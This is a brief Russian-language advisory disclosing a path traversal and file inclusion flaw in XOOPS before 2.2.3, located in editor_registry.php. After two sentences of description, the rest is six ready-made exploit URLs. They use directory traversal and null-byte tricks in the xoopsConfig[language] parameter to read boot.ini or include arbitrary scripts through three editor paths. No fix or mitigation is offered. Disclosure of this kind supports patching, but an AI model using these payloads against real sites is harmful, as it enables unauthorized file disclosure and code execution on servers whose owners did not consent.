Уязвимости в XOOPS 2.2.3

Уязвимость в Xoops <2.2.3 позволяет удаленному пользователю просмотреть или выполнить совершенно любые файлы на системе. Уязвимость существует в class/xoopseditor/textarea/editor_registry.php.
Эксплойт состоит в следующем:
http://test.ru/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://test.ru/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://test.ru/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://test.ru/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://test.ru/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://test.ru/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00